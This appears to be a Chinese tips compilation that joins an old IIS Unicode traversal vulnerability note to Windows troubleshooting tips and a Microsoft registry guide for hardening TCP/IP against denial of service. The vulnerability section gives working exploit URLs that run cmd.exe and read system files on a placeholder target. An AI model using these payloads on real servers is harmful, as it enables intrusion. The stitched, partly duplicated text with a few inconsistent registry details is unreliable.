(13)、IIS存在的Unicode解析错误漏洞
NSFOCUS安全小组发现微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。
你可以使用下面的方法利用这个漏洞:
(1) 如果系统包含某个可执行目录,就可能执行任意系统命令。下面的URL可能列出当前目录的内容:
http://www.目标机.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
(2) 利用这个漏洞查看系统文件内容也是可能的:
http://www.目标机.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
这个漏洞是针对中文操作平台,你也可以使用"%c0%af"或者"%c1%9c"来测试英文版本,原因就是编码不同。
任务管理器
1.快速刷新注册表:
在进程选项卡选择“explorer.exe”,然后结束该进程,在“创建新任务”窗口中输入“explorer.exe”,,运行后注册表就已经刷新了。
2.电脑一秒关机(winxp):
调出任务管理器,按住“ctrl”键同时点击窗口菜单“关机-关闭”,电脑即可马上关机
3.IE不能打开二级窗口:
IE不能打开新的窗口,用鼠标点击超链接也没有任何反应。这时重装IE一般能解决问题。其实不必这么麻烦,这里给大家介绍两种简单方法来修复这类错误。
一、使用regsvr32命令重新注册控件
在“开始—运行”中键入“regsvr32 actxprxy.dll”命令,点击“确定”按钮,这时会弹出一个信息对话框提示注册成功,点击“确定”;然后再在“开始—运行”中键入“regsvr32 shdocvw.dll”命令,在弹出的对话框中单击“确定”即可。重新启动后IE已经被轻松修复了。
二、使用“IE不能打开新窗口链接修复工具V3.75”修复
如果初学者觉得以上的方法过于复杂,不便于操作,可以直接使用“IE不能打开新窗口链接修复工具”进行修复,下载地址:http://www.skycn.com/soft/23130.html。该程序主要用于解决IE无法打开新窗口链接的故障。程序在运行时会弹出修复提示,只要点击“确定”按钮即可修复。目前此工具己全面IE、傲游、TT、GreenBrowser等浏览器的任何版本的修复。
realplayer
1.realplayer卸载后无法重新安装:
进入realplayer安装目录中的“setup\.r1pclean.exe”,将以前的安装信息彻底删除,然后即可重新安装realplayer。
2.勇realplayer播放文件时,声音在动,画面不动:
点击“视图-首选项”,“连接”选项卡,设置缓冲播放为“至少缓冲30秒....”,再找到“性能‘选项卡,设置“剪辑高级缓冲”,设为50MB。
如何强化 TCP/IP 堆栈
如何强化 TCP/IP 堆栈
发布日期: 09/02/2004 | 更新日期: 09/02/2004改进 Web 应用程序安全性:威胁和对策
J.D. Meier、Alex Mackman、Michael Dunner、Srinath Vasireddy、Ray Escamilla 和 Anandha Murukan
Microsoft Corporation
请参阅着陆页以获得《改进 Web 应用程序安全性:威胁和对策》的起点和完整的概述。
摘要: 您可以在 Windows 注册表中配置各种 TCP/IP 参数,以便防止网络级拒绝服务的攻击,包括 SYN 洪水攻击、ICMP 攻击和 SNMP 攻击。您可以将注册表项配置为:
• 当检测到攻击时,启用 SYN 洪水保护。
• 设置用于确定攻击构成要素的阈值。
该方法文档为管理员展示了必须配置的注册表项和注册表值,以防止受到基于网络的拒绝服务攻击。
注 这些设置会修改 TCP/IP 在服务器上的工作方式。Web 服务器的特性将决定要触发拒绝服务对策的最佳阈值。有些值可能对您的客户端连接的限制非常严格。在部署到产品服务器之前,请先测试本文档的建议。
本页内容
改进 Web 应用程序安全性:威胁和对策
J.D. Meier、Alex Mackman、Michael Dunner、Srinath Vasireddy、Ray Escamilla 和 Anandha Murukan
Microsoft Corporation
请参阅着陆页以获得《改进 Web 应用程序安全性:威胁和对策》的起点和完整的概述。
摘要: 您可以在 Windows 注册表中配置各种 TCP/IP 参数,以便防止网络级拒绝服务的攻击,包括 SYN 洪水攻击、ICMP 攻击和 SNMP 攻击。您可以将注册表项配置为:
| • | 当检测到攻击时,启用 SYN 洪水保护。 |
| • | 设置用于确定攻击构成要素的阈值。 |
该方法文档为管理员展示了必须配置的注册表项和注册表值,以防止受到基于网络的拒绝服务攻击。
注 这些设置会修改 TCP/IP 在服务器上的工作方式。Web 服务器的特性将决定要触发拒绝服务对策的最佳阈值。有些值可能对您的客户端连接的限制非常严格。在部署到产品服务器之前,请先测试本文档的建议。
 | 预备知识 |
| 防止 SYN 攻击 |
| 防止 ICMP 攻击 |
| 防止 SNMP 攻击 |
| AFD.SYS 保护 |
| 其他保护 |
| 缺陷 |
| 其他资源 |
预备知识
TCP/IP 是一种本质上不安全的协议。但是,Windows 2000 实现可以使您配置其操作以防止网络的拒绝服务攻击。默认情况下,本文中所涉及的一些项和值可能并不存在。在这些情况下,请创建该项、值或值数据。
有关 Windows 2000 的注册表所控制的 TCP/IP 网络设置的详细信息,请参阅白皮书“Microsoft Windows 2000 TCP/IP Implementation Details”,位于 http://www.microsoft.com/technet/itsolutions/network/deploy/depovg/tcpip2k.asp。
SYN 攻击利用 TCP/IP 连接建立机制中的安全漏洞。要发动 SYN 洪水攻击,攻击者要使用程序来发送大量的 TCP SYN 请求来填充服务器上挂起的连接队列。这将导致其他用户无法建立网络连接。
要防止网络受到 SYN 攻击,请遵循下列通用的步骤,这些步骤稍后将于本文档中进行解释:
| • | 启用 SYN 攻击保护 |
| • | 设置 SYN 保护阈值 |
| • | 设置其他保护 |
启用 SYN 攻击保护
启用 SYN 攻击保护的命名值位于下面的注册表项中: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.
值名称:SynAttackProtect
建议值: 2
有效值: 0 -2
说明: 引起 TCP 调整 SYN-ACKS 的重新传输。如果您配置这个值,当发生 SYN 攻击时,连接响应的超时速度会比较快。当超出 TcpMaxHalfOpen 或 TcpMaxHalfOpenRetried 的值时,便会触发 SYN 攻击。
设置 SYN 保护阈值
下列值确定要触发的 SYN 保护的阈值。本部分中的所有项和值都位于注册表项 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services 中。这些项和值如下所示:
| • | 值名称:TcpMaxPortsExhausted 建议值: 5 有效值: 0-65535 说明: 指定 TCP 连接请求的阈值,必须超过该阈值才会触发 SYN 洪水保护。 |
| • | 值名称:TcpMaxHalfOpen 建议值数据: 500 有效值: 100-65535 说明: 启用 SynAttackProtect 时,该值会指定在 SYN_RCVD 状态下的 TCP 连接的阈值。超过 SynAttackProtect 时,便会触发 SYN 洪水保护。 |
| • | 值名称:TcpMaxHalfOpenRetried 建议值数据: 400 有效值: 80-65535 说明: 启用 SynAttackProtect 时,该值指定在 SYN_RCVD 状态下的 TCP 连接的阈值,其中至少已经进行了一次重新传输。超过 SynAttackProtect 时,便会触发 SYN 洪水保护。 |
设置其他的保护
本部分中的所有项和值都位于注册表项 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services 中。这些项和值如下所示:
| • | 值名称:TcpMaxConnectResponseRetransmissions 建议值数据: 2 有效值: 0-255 说明: 对取消尝试响应 SYN 请求之前要重新传输 SYN-ACK 的次数进行控制+。 |
| • | 值名称:TcpMaxDataRetransmissions 建议值数据: 2 有效值: 0-65535 说明: 指定 TCP 在中止连接前,要重新传输单独数据片断(而并非连接请求片断)的次数。 |
| • | 值名称:EnablePMTUDiscovery 建议值数据: 0 有效值: 0, 1 说明: 将该值设置为 1(默认值)时,便会强制 TCP 在到远程主机的路径上找到最大传输单位或最大数据包大小。攻击者可能会强制数据包分割,造成堆栈负荷过重。将该值设置为 0 会强制不是本地子网的主机连接都使用 576 字节的 MTU。 |
| • | 值名称:KeepAliveTime 建议值数据: 300000 有效值: 80-4294967295 说明: 通过发送保持活动数据包,指定 TCP 尝试验证闲置连接是否仍然原封不动的频率。 |
| • | 值名称:NoNameReleaseOnDemand 建议值数据: 1 有效值: 0, 1 说明: 当计算机接收到名称释放请求时,指定不要释放计算机的 NetBIOS 名称。 |
请使用表 1 中总结的值来建立最大保护。
| 表 1 建议值 | |
| 值名称 | 值 (REG_DWORD) |
SynAttackProtect | 2 |
TcpMaxPortsExhausted | 1 |
TcpMaxHalfOpen | 500 |
TcpMaxHalfOpenRetried | 400 |
TcpMaxConnectResponseRetransmissions | 2 |
TcpMaxDataRetransmissions | 2 |
EnablePMTUDiscovery | 0 |
KeepAliveTime | 300000 (5 minutes) |
NoNameReleaseOnDemand | 1 |
本部分中指定的值位于注册表项HKLM\System\CurrentControlSet\Services\AFD\Parameters 下
值:EnableICMPRedirect
建议值数据: 0
有效值: 0(禁用)、1(启用)
说明: 将该注册表值修改为 0 可以防止接收到 ICMP 重定向数据包时,创建代价高昂的主机路由。
请使用表 2 中总结的值来建立最大保护。
| 表 2 建议值 | |
| 值名称 | 值 (REG_DWORD) |
EnableICMPRedirect | 0 |
防止 SNMP 攻击
本部分中指定的值位于注册表项HKLM\System\CurrentControlSet\Services\Tcpip\Parameters 下。
值:EnableDeadGWDetect
建议值数据: 0
有效值: 0(禁用)、1(启用)
说明: 防止攻击者强制切换到次要网关
请使用表 3 中总结的值来建立最大保护。
| 表 3 建议值 | |
| 值名称 | 值 (REG_DWORD) |
EnableDeadGWDetect | 0 |
AFD.SYS 保护
下列项指定内核模式驱动程序 Afd.sys 的参数。Afd.sys 用于支持 Windows 套接字应用程序。本部分中的所有项和值都位于注册表项 HKLM\System\CurrentControlSet\Services\AFD\Parameters 中。这些项和值如下所示:
| • | 值:EnableDynamicBacklog 建议值数据: 1 有效值: 0(禁用)、1(启用) 说明: 指定 AFD.SYS 功能来有效抵御大量的 SYN_RCVD 连接。有关详细信息,请参阅“Internet Server Unavailable Because of Malicious SYN Attacks”,位于 http://support.microsoft.com/default.aspx?scid=kb;en-us;142641。 |
| • | 值名称:MinimumDynamicBacklog 建议值数据: 20 有效值: 0-4294967295 说明: 指定侦听终结点上允许的可用连接的最小数量。如果可用连接的数目低于该值,线程便会排入队列以创建其他的可用连接。 |
| • | 值名称: MaximumDynamicBacklog 建议值数据: 20000 有效值: 0-4294967295 说明: 指定可用连接再加上 SYN_RCVD 状态中的连接的总数的最大值。 |
| • | 值名称:DynamicBacklogGrowthDelta 建议值数据: 10 有效值: 0-4294967295 默认为存在: No 说明: 指定需要其他连接时将创建的可用连接数量。 |
请使用表 4 中所总结的值来建立最大保护。
| 表 4 建议值 | |
| 值名称 | 值 (REG_DWORD) |
EnableDynamicBacklog | 1 |
MinimumDynamicBacklog | 20 |
MaximumDynamicBacklog | 20000 |
DynamicBacklogGrowthDelta | 10 |
其他保护
本部分中的所有项和值都位于注册表项 HKLM\System\CurrentControlSet\Services\Tcpip\Parameters 中。
保护筛选的网络详细信息
网络地址转换 (NAT) 用于筛选来自传入连接的网络。攻击者可以使用 IP 源路由来避开该筛选以确定网络拓扑。
值:DisableIPSourceRouting
建议值数据: 1
有效值: 0(转发所有数据包)、1(不转发源路由的数据包)、2(丢弃所有传入源路由的数据包)。
说明: 禁用 IP 源路由,发送方可以利用 IP 源路由来确定数据包通过网络时应该采用的路由。
避免接收分段的数据包
处理分段数据包的代价可能很高。虽然拒绝服务极少来自周边网络的内部,但是该设置可以防止分段数据包的处理。
值:EnableFragmentChecking
建议值数据: 1
有效值: 0(禁用)、1(启用)
说明: 防止 IP 堆栈接受分段的数据包。
不转发送往多主机的数据包
多主机可能会响应多播数据包,进而造成在网络中广泛传播的响应。
值:EnableMulticastForwarding
建议值数据: 0
有效范围: 0 (false)、1 (true)
说明: 路由服务使用这个参数来控制是否要转发 IP 多播。该参数是由路由和远程访问服务创建的。
只有防火墙在网络间转发数据包
多主服务器不能在所连接的各个网络间转发数据包。防火墙是明显的例外。
值:IPEnableRouter
建议值数据: 0
有效范围: 0 (false)、1 (true)
说明: 将该参数设置为 1 (true) 可使系统在所连接的各个网络间路由 IP 数据包。
掩码网络拓扑详细信息
使用 ICMP 数据包可以请求主机的子网掩码。公开该信息本身并无大碍;但是,多主机的响应可能会被用于构建内部网络的信息。
值:EnableAddrMaskReply
建议值数据: 0
有效范围: 0 (false)、1 (true)
说明: 该参数控制计算机是否响应 ICMP 地址掩码请求。
请使用表 5 中总结的值来建立最大保护。
| 表 5 建议值 | |
| 值名称 | 值 (REG_DWORD) |
DisableIPSourceRouting | 1 |
EnableFragmentChecking | 1 |
EnableMulticastForwarding | 0 |
IPEnableRouter | 0 |
EnableAddrMaskReply | 0 |
缺陷
测试这些值的更改时,请根据您在生产中预期使用的网络卷来进行测试。这些设置会修改被认为是正常的阈值,而且偏离经过测试的默认值。如果各个客户端的连接速度差异很大,那么有些设置可能过于狭隘而无法稳定地支持客户端。
其他资源
有关 TCP/IP 的其他详细信息,请参考下列资源:
| • | 有关强化 TCP/IP 堆栈的详细信息,请参阅 Microsoft 知识库文章 315669“How To:Harden the TCP/IP Stack Against Denial of Service Attacks in Windows 2000”。 |
| • | 有关 Windows 2000 TCP/IP 实现的详细信息,请参阅 Lee Davies 的“Windows 2000 TCP/IP Protocols and Services”(Microsoft Press 书籍)。 |
| • | 有关 Windows 2000 TCP/IP 实现的详细信息,请参阅 TechNet 网站上的“Microsoft Windows 2000 TCP/IP Implementation Details”,位于 http://www.microsoft.com/technet/itsolutions/network/deploy/depovg/tcpip2k.asp。 |